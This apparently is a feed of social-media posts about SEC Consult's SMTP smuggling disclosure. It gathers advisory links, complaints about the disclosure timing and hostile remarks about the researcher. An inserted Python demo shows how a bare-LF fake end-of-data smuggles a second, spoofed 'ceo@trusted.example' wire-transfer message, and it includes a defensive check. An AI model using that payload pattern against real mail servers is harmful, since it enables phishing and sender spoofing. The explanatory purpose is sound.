After having been informed by @mathieui that #Exim is also affected, I compiled a list of what #SECConsult documented and what has been found out in the meantime. SEC Consult documented 11 mail systems (software and/or providers; many with millions of accounts) vulnerable to some form of #SMTPSmuggling. But they only informed 3. With #Exim also vulnerable (apparently presumed "clean" by SEC Consult), the list is now 12.
https://netfuture.ch/2023/12/smtp-smuggling-status/
SMTP Smuggling Status (Netfuture)

«SMTP Smuggling» is a vulnerability that allows circumventing some mail checks at the receiver and therefore lets additional spam and/or phishing messages through. Here is the list of what we currently know. Interested in the full story? I have written a German 🇩🇪 article on SMTP Smuggl
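The posts on this page describe SMTP smuggling only as a way to get extra mail past receiver-side checks. As an added example (not code from the original page, from SEC Consult or from any MTA), the Python below models the mechanism at the protocol level: RFC 5321 ends a message with the sequence <CR><LF>.<CR><LF>; if an inbound server also accepts shorter variants built from a bare CR or LF, and the outbound server relays such a sequence unchanged, one DATA payload is read as two messages, the second with an envelope the attacker chose. The lenient terminator set, the host names and the message contents are constructed for this demo and make no claim about any specific product; `parse_session` and `contains_bare_newline` are names chosen here.

```python
"""SMTP smuggling at the DATA stage, as a parser experiment.

Added example; not code from the original page, from SEC Consult or
from any MTA.  Per RFC 5321 a message ends with <CR><LF>.<CR><LF>.
If the inbound server also accepts shorter variants (e.g. <LF>.<LF>)
and the outbound server relays such a sequence unchanged, one DATA
payload is read as two messages, the second with an envelope the
attacker chose.  All sessions below are constructed for this demo.
"""
import re

# Standard end-of-data (EOD) sequence only.
STRICT_EOD = (b"\r\n.\r\n",)
# Assumed lenient set for the demo: the standard EOD plus variants built
# from bare CR / LF.  Which variants a real MTA accepted is not claimed.
LENIENT_EOD = (b"\r\n.\r\n", b"\n.\n", b"\r.\r", b"\n.\r\n", b"\r\n.\r")

# A bare <LF> (not preceded by <CR>) or a bare <CR> (not followed by <LF>).
BARE_NEWLINE = re.compile(rb"(?<!\r)\n|\r(?!\n)")


def parse_session(stream: bytes, eod_sequences=STRICT_EOD) -> list[dict]:
    """Model an inbound SMTP server reading a client's command stream.

    Returns one dict per accepted message: mail_from, rcpt_to, body.
    Commands are CRLF-terminated; only MAIL, RCPT and DATA matter here.
    Dot-unstuffing and server replies are omitted; they do not change
    the point being shown.
    """
    messages = []
    envelope = {"mail_from": None, "rcpt_to": []}
    pos = 0
    while pos < len(stream):
        line_end = stream.find(b"\r\n", pos)
        if line_end < 0:
            break
        line, pos = stream[pos:line_end], line_end + 2
        upper = line.upper()
        if upper.startswith(b"MAIL FROM:"):
            envelope["mail_from"] = line[len(b"MAIL FROM:"):].strip().decode()
        elif upper.startswith(b"RCPT TO:"):
            envelope["rcpt_to"].append(line[len(b"RCPT TO:"):].strip().decode())
        elif upper == b"DATA":
            # The CRLF that ended the DATA line may also be the start of
            # the terminator (empty body), so search from two bytes back.
            # Earliest match wins; on a tie the longer sequence wins.
            hits = [(stream.find(seq, pos - 2), -len(seq), seq)
                    for seq in eod_sequences]
            hits = [h for h in hits if h[0] >= 0]
            if not hits:
                raise ValueError("DATA without end-of-data sequence")
            idx, _, seq = min(hits)
            messages.append({
                "mail_from": envelope["mail_from"],
                "rcpt_to": envelope["rcpt_to"],
                "body": stream[pos:max(pos, idx)],
            })
            envelope = {"mail_from": None, "rcpt_to": []}
            pos = idx + len(seq)
    return messages


def contains_bare_newline(data: bytes) -> bool:
    """Outbound-side check: is there a CR or LF that is not part of a
    CRLF pair?  A relaying server that rejects (or normalises) such data
    never forwards a fake terminator to the next hop."""
    return BARE_NEWLINE.search(data) is not None


# Constructed attack session: a legitimate envelope, then a fake EOD
# inside the body, followed by a second, spoofed envelope and message.
SMUGGLED_SESSION = (
    b"EHLO attacker.example\r\n"
    b"MAIL FROM:<attacker@attacker.example>\r\n"
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"From: attacker@attacker.example\r\n"
    b"Subject: harmless\r\n"
    b"\r\n"
    b"first message body"
    b"\n.\n"                                  # fake end-of-data (bare LF)
    b"MAIL FROM:<ceo@trusted.example>\r\n"    # spoofed envelope sender
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"From: ceo@trusted.example\r\n"
    b"Subject: urgent wire transfer\r\n"
    b"\r\n"
    b"please pay the attached invoice"
    b"\r\n.\r\n"                              # real end-of-data
    b"QUIT\r\n"
)

# Constructed ordinary session for comparison: only CRLF line endings.
CLEAN_SESSION = (
    b"EHLO client.example\r\n"
    b"MAIL FROM:<alice@client.example>\r\n"
    b"RCPT TO:<bob@target.example>\r\n"
    b"DATA\r\n"
    b"Subject: hi\r\n\r\nno tricks here\r\n.\r\n"
    b"QUIT\r\n"
)

if __name__ == "__main__":
    for label, eod in (("strict", STRICT_EOD), ("lenient", LENIENT_EOD)):
        msgs = parse_session(SMUGGLED_SESSION, eod)
        print(f"{label}: {len(msgs)} message(s)")
        for m in msgs:
            print("   MAIL FROM", m["mail_from"], "->", m["rcpt_to"])
    print("bare newline in attack stream:",
          contains_bare_newline(SMUGGLED_SESSION))
```

With the strict terminator the attack stream yields one message from the attacker; with the lenient set it yields a second message whose envelope sender is ceo@trusted.example, which is the spoofing the talk title refers to, and which arrives without the first message's sender checks being applied to it. The `contains_bare_newline` check is the outbound-side defence: reject or normalise bare CR/LF in message data before relaying. Postfix's advisory, linked further down on this page, describes its corresponding setting, smtpd_forbid_bare_newline.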
Everyone attending #SECConsult #TimoLongin's #37c3 #SMTPSmuggling talk
https://events.ccc.de/congress/2023/hub/en/event/smtp_smuggling_spoofing_e-mails_worldwide/
should at least boo them for shitting the devs in the face right before the holidays.
SMTP Smuggling – Spoofing E-Mails Worldwide - 37C3

@moanos
I can't remember a C3 talk where #eggs or rotten #tomatoes were thrown at the presenter. That would be a first, IMHO.
#37C3 #SMTPsmuggling #SECconsult

E-mails that smuggle e-mails and thereby enable phishing mails!? No fun for postmasters shortly before the Christmas holidays. - We show what it is actually about and what admins and postmasters can do now.

#SMTP #smuggling #Postfix #Mailserver #Postmaster #MTA #Spoofing #SMTPSmuggling #SECconsult

https://www.heinlein-support.de/blog/smtp-smuggling-aka-postmasters-weihnachtsstress

SMTP smuggling aka postmasters' Christmas stress | Heinlein Support GmbH

Who is to blame for all the excitement? The CCC. Well, at least indirectly. Timo Longin of SEC Consult examined various MTA implementations and found inconsistencies in them.

Some additional links:

The blog post describing the attack:
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/

Security advisory by #Postfix, clearly pissed:
https://www.postfix.org/smtp-smuggling.html

Some reactions from across the fedi:
https://zombofant.net/@jssfr/111618969359339789
https://gay-pirate-assassins.de/@moanos/statuses/01HJ8D8XQ7ZJ89HN4TZFZZ9AS8
https://waldvogel.family/@marcel/111622567290149119

As Timo clearly likes getting recognition for his work, I for one will be remembering his name, and the name of #SECConsult, his employer, for giving us this Christmas present. 💝

Thanks Timo. Now get off the fucking stage.

SMTP Smuggling - Spoofing E-Mails Worldwide: Introducing a novel technique for e-mail spoofing (SEC Consult)
A few days before all system administrators retreat to their families for their well-earned Christmas holidays, SEC Consult drops the bomb: the anti-spam measures of the most widely used mail servers can be bypassed, and even the lecture tour about it is already planned. The only problem: the most widely used mail server knows nothing about it, and its users are unprotected.
#SMTP #SMTPSmuggling #Postfix #SECconsult #disclosure
https://dnip.ch/2023/12/22/nicht-wirklich-responsible-disclosure-die-extraportion-spam-ueber-die-festtage/
Not really «responsible disclosure»: the extra helping of spam over the holidays - Das Netz ist politisch

"🚨 Multiple Vulnerabilities Unveiled in SAP® Enable Now Manager 🚨"

SEC Consult has disclosed multiple vulnerabilities in SAP® Enable Now Manager, which could potentially allow a remote, unauthenticated attacker to create new administrative user accounts by exploiting a chain of vulnerabilities. The vulnerabilities include Open Redirect, Reflected Cross Site Scripting (XSS), and Insufficient Cross-Site Request Forgery (CSRF) Protection. The vendor has pushed a fix in the May 2023 Release for the Cloud Edition.

🔗 Source: Full Disclosure Mailing List

🔗 Advisory URL: SEC Consult

Tags: #SAP #Vulnerability #CyberSecurity #InfoSec #XSS #CSRF #OpenRedirect #SECConsult #CyberAttack #PatchUpdate 🌐🔐🔍

👥 Researchers: Paul Serban, Fabian Hagg from SEC Consult Vulnerability Lab (SEC Consult)

Full Disclosure: SEC Consult SA-20230927-0 :: Multiple Vulnerabilities in SAP® Enable Now Manager

Researchers find hole in EU-wide identity system - The EU has fixed a flaw in the powerful yet complex eIDAS digital identification system that let p... more: https://nakedsecurity.sophos.com/2019/10/31/researchers-find-hole-in-eu-identity-system/ #authenticationandtrustservices #electronicidentification #governmentsecurity #securitythreats #vulnerability #europeanunion #secconsult #eidas #eu